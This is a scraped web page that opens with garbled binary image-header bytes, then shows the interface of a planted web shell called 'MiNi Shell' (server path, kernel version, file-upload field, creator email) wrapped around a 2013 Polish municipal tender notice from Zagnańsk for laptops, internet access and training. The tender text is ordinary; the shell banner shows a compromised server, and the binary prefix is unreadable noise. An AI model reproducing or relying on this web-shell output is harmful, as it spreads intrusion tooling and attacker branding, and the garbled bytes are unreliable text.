JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130507/68015-N-2013.html

<p class="kh_header"><b>Zagnańsk: Dostawa sprzętu komputerowego oraz świadczenie usług dostępu do Internetu w ramach projektu pn. Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Zagnańsk, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka</b><br>
<b>Numer ogłoszenia: 68015 - 2013; data zamieszczenia: 07.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zagnańsk , ul. Spacerowa 8, 26-050 Zagnańsk, woj. świętokrzyskie, tel. 41 3001322, faks 41 3001373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zagnansk.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego oraz świadczenie usług dostępu do Internetu w ramach projektu pn. Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Zagnańsk, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje:
1) Dostawa notebooków wraz z ich instalacją i konfiguracją dla Beneficjentów Ostatecznych - 35 szt., a także wraz z pakietem oprogramowania do każdego zestawu w wersji polskiej bez ograniczonej czasowo możliwości korzystania (systemowe, biurowe i antywirusowe), który będzie w pełni kompatybilny z systemem operacyjnym.
2) Dostawa urządzeń wielofunkcyjnych oraz słuchawek z mikrofonem wraz z ich instalacją i konfiguracją dla Beneficjentów Ostatecznych - 35 szt.
3) Dostawa notebooków wraz z ich instalacja i konfiguracją do Lokalnego Punktu Społeczeństwa Informacyjnego - 5 szt., a także wraz z pakietem oprogramowania do każdego zestawu w wersji polskiej bez ograniczonej czasowo możliwości korzystania (systemowe, biurowe i antywirusowe), który będzie w pełni kompatybilny z systemem operacyjnym.
4) Dostawa drukarki sieciowej, urządzeń transmisyjnych, okablowania, serwera wraz z osprzętem oraz słuchawek z mikrofonem (5 szt.), wraz z instalacją, utrzymaniem i aktualizacją serwera do Lokalnego Punktu Społeczeństwa Informacyjnego 
5) Dostawa zestawów i urządzeń umożliwiających korzystanie z usługi internetowej wraz z ich instalacją i konfiguracją dla 35 Beneficjentów Ostatecznych oraz do Lokalnego Punktu Społeczeństwa Informacyjnego.
6) Usługa dostępu do Internetu dla 35 Beneficjentów Ostatecznych oraz dla Lokalnego Punktu Społeczeństwa Informacyjnego (5 zestawów komputerowych + serwer).
7) Usługa szkoleniowa dla Beneficjentów Ostatecznych - 20 godzin szkoleń.
8) Ubezpieczenie, serwis i modernizacja sprzętu komputerowego.

Szczegółowy opis przedmiotu zamówienia
1) 35 zestawów komputerowych wymienionych w ust. 2 pkt 1, 2 zostanie użyczone wraz z oprogramowaniem (systemowe, biurowe, antywirusowe) na podstawie umów użyczenia na cele nie komercyjne beneficjentom ostatecznym wyłonionym w przeprowadzonym naborze w ramach projektu. Zamawiający nie wyklucza ewentualnych zmian podmiotów na rzecz których następować będzie użyczenie. Zestawy te będą wykorzystywane przez cały okres trwania projektu, tj. do 31.12.2015r. Zamawiający wskaże miejsce instalacji sprzętu komputerowego na terenie Gminy Zagnańsk.
2) 5 zestawów komputerowych wymienionych w ust. 2 pkt 3, 4 tj. (5 notebooków, drukarka sieciowa, słuchawki z mikrofonem, urządzenia transmisyjne, okablowanie, serwer z osprzętem) wraz z oprogramowaniem (systemowe, biurowe, antywirusowe) oraz serwer będzie wykorzystywanych w miejscu wskazanym przez Zamawiającego w ramach utworzonego Lokalnego Punktu Społeczeństwa Informacyjnego na terenie Gminy Zagnańsk.
3) Świadczenie usług dostępu do Internetu przez okres od daty przekazania sygnału do dnia 31.12.2015 r. wraz z dostarczeniem zestawów i urządzeń umożliwiających korzystanie z oferowanej usługi internetowej do wszystkich 35 Beneficjentów Ostatecznych oraz do Lokalnego Punktu Społeczeństwa Informacyjnego w miejscach wskazanych przez Zamawiającego na terenie Gminy Zagnańsk. Wykonawca zbada warunki techniczne potrzebne do montażu sprzętu komputerowego oraz instalacji Internetu. Wykonawca za stałe miesięczne zryczałtowane wynagrodzenie będzie zobowiązany do zapewnienia dostępu do Internetu dla wszystkich 35 Beneficjentów Ostatecznych oraz do Lokalnego Punktu Społeczeństwa Internetowego.
4) Przedmiot umowy obejmuje przeprowadzenie cyklu 20 godzin szkoleń dla Beneficjentów Ostatecznych. Zakres szkoleń: podstawowa obsługa komputera, korzystanie z Internetu, dostęp do portali informacyjnych. Wykonawca zadba o materiały szkoleniowe oraz catering. Wykonawca przedstawi Zamawiającemu program szkolenia. Szkolenia będą przeprowadzone w ilości 10 godzin. w 2013r., 5 godzin w 2014r. oraz 5 godz. w 2015r. Szkolenia odbędą się w Lokalnym Punkcie Społeczeństwa Informacyjnego.
5) Zamawiający posiada oświadczenia beneficjentów projektu o wyrażeniu zgody na udział w projekcie, co za tym idzie na montaż zestawów komputerowych oraz urządzeń do przesyłania sygnału internetowego.
6) Szczegółowy opis przedmiotu zamówienia uwzględniający potrzeby Zamawiającego został zawarty w specyfikacji technicznej stanowiącej załącznik nr 7 do SIWZ. Zaproponowany przez Wykonawcę sprzęt powinien charakteryzować się parametrami nie gorszymi niż podane 
w specyfikacji technicznej. Wykonawca odpowiedzialny jest za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
7) Sprzęt komputerowy musi być ubezpieczony na wypadek jego uszkodzenia, być objęty okresem gwarancji - 3 lata. W okresie gwarancji Wykonawca zobowiązuje się reagować na telefoniczne, mailowe zgłoszenie serwisowe, czas reakcji serwisu (podjęcie czynności zmierzających do usunięcia zgłoszonej wady/usterki) wynosi maksymalnie 48 godzin 
w miejscu instalacji sprzętu. W przypadku niemożności dokonania napraw w miejscu użytkowania sprzętu Wykonawca zobowiązuje się zapewnić na czas naprawy sprzęt zastępczy o parlamentach nie gorszych niż sprzęt zabrany do naprawy. W przypadku niemożności dokonania naprawy gwarancyjnej w ciągu 7 dni od daty zabrania sprzętu do naprawy, Zamawiający może zlecić wykonanie usługi gwarancyjnej innej firmie a należność pokryć na koszt Wykonawcy. Wykonawca zobowiązany jest również do czyszczenia i konserwacji dostarczonych Urządzeń, przeprowadzenia diagnostyki zestawów komputerowych, podzespołów oraz w razie potrzeby reinstalację systemu operacyjnego bez utraty danych wraz z ponowną instalacją niezbędnego oprogramowania.
8) Wykonawca zobowiązany jest do zapewnienia stałej opieki serwisowej sprzętu komputerowego i zainstalowanego na nim oprogramowania w siedzibach 35 Beneficjentów Końcowych - gospodarstwach domowych będących odbiorcami Projektu, na terenie Gminy Zagnańsk (wykaz adresów zostanie dołączony do Umowy) oraz w siedzibie Lokalnego Punktu Społeczeństwa Informacyjnego (5 zestawów + serwer). Przez czas trwania opieki serwisowej (gwarancji) od dnia podpisania protokołu odbioru jakościowego (dzień rozpoczęcia realizacji przedmiotu zamówienia), po dostarczeniu sprzętu i oprogramowania do wskazanej przez Zamawiającego lokalizacji, łącznie z miesiącem, w którym dostarczony zostanie zestaw komputerowy i oprogramowanie, do dnia 31.12.2015r.. Wykonawca za stałe miesięczne zryczałtowane wynagrodzenie będzie zobowiązany do utrzymania w pełnej sprawności technicznej zestawy komputerowe z oprogramowaniem.
9) Producent sprzętu komputerowego uprawni Wykonawcę usług serwisowych  do wykonywania opieki serwisowej bez utraty praw do gwarancji wraz z możliwością nanoszenia plomb gwarancyjnych (producenta lub własnych) po wykonaniu usługi.
10) Wykonawca jest zobowiązany do podania szczegółowych konfiguracji oferowanych urządzeń zgodnie z treścią Załącznika Nr 7 do SIWZ, przy czym parametry techniczne i okresy gwarancji określone w Specyfikacji technicznej sprzętu komputerowego i pozostałych urządzeń stanowią wymagania minimalne, które musi spełnić oferowany sprzęt. Wykonawca może zaoferować lepsze parametry sprzętu pod warunkiem, że nie spowodują one dodatkowych kosztów po stronie Zamawiającego w stosunku do ceny oferowanej Wykonawcy.

Wymagania w zakresie innych cech:
1) wykonawca dostarczy przedmiot umowy własnym transportem, na własny koszt i na własne ryzyko, w miejsca wskazane przez Zamawiającego (załącznik nr 6),
2) sprzęt i urządzenia będące przedmiotem zamówienia muszą być fabrycznie nowe, kompletne a także wolne od wszelkich wad fizycznych i prawnych oraz gotowe do użytku bez żadnych dodatkowych zakupów i inwestycji,
3) do wszystkich urządzeń należy dołączyć wszelkie kable niezbędne do ich prawidłowego użytkowania,
4) sprzęt komputerowy i sieciowy musi posiadać instrukcję oraz dokumenty gwarancyjne w języku polskim,
5) wykonawca zobowiązuje się do modernizacji zestawu komputerowego oraz zaktualizowania oprogramowania przed zakończeniem realizacji projektu 
tj. w pierwszym miesiącu IV kwartału 2015r.
6) za szkody wyrządzone przez Wykonawcę podczas wykonania przedmiotu zamówienia odpowiedzialność ponosi Wykonawca (finansowo i rzeczowo). 
7) Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia,
8) Wykonawca dochowa należytej staranności przy realizacji zamówienia
9) Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. Wymagane jest określenie przez wykonawcę telefonów kontaktowych i numerów faksów oraz innych ustaleń niezbędnych do utrzymania kontaktu wykonawcy z zamawiającym celem sprawnego i terminowego wykonania zamówienia.
10) Sprzęt komputerowy powinien posiadać datę produkcji nie wcześniej niż 2012r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.41.00.00-7, 72.41.10.00-4, 72.26.80.00-1, 72.26.30.00-6, 72.54.10.00-9, 30.23.21.00-5, 30.21.31.00-6, 66.51.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca składając ofertę zobowiązany jest do wniesienia wadium w wysokości 5000,00 zł przed upływem terminu składania ofert. 
2. Wadium może być wniesione w: 
a) pieniądzu, 
b) poręczeniach bankowych, 
c) poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
d) gwarancjach bankowych, 
e) gwarancjach ubezpieczeniowych, 
f) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). 
3. Wadium w pieniądzu należy wpłacić przelewem na konto Zamawiającego: Bank Spółdzielczy w Samsonowie, nr konta 58 8512 0002 2001 0000 0143 0005 z zaznaczeniem, że dotyczy przetargu Dostawa sprzętu komputerowego oraz świadczenie usług dostępu do Internetu w ramach projektu p.n. Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Zagnańsk, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka.
4.  Wadium musi być wniesione przed upływem składania ofert. 
5. Oryginał wadium należy złożyć w siedzibie Zamawiającego - w kasie Urzędu Gminy Zagnańsk (w godzinach pracy Urzędu). Kopię dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty. 
6. Wadium składane w formach wymienionych w pkt 2 b) - f) musi mieć datę początkową ważności równą, co najmniej dniu upływu terminu składania ofert, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą oraz posiadać stosowne zapisy określone w art. 46 ust. 4a i 5 ustawy. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
9. Zamawiający zwraca niezwłocznie wadium w sytuacjach określonych w art. 46 ust. 1, 1a i 2 z zastrzeżeniem art. 46 ust. 4a ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna prowadzenie przez wykonawcę działalności gospodarczej w zakresie objętym przedmiotem zamówienia zarejestrowanej w Krajowym Rejestrze Sądowym lub innym organie działalności gospodarczej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia niniejszego warunku Wykonawca złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączy dowody, czy zostały wykonane lub są wykonywane należycie - Wykonawca powinien wykazać co najmniej jedno zamówienie odpowiadające swym rodzajem i wartością przedmiotowi zamówienia o wartości co najmniej 50 000 zł, jak również zamówienie sprzętu komputerowego w ilości minimum 20 zestawów komputerowych jako jedno zadanie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca udokumentuje, że posiada ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zagnansk.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zagnansk.biuletyn.net.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 12:00, miejsce: Budynek Urzędu Gminy w Zagnańsku, 
ul. Spacerowej 8 w sali konferencyjnej parter -pokój nr 8b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com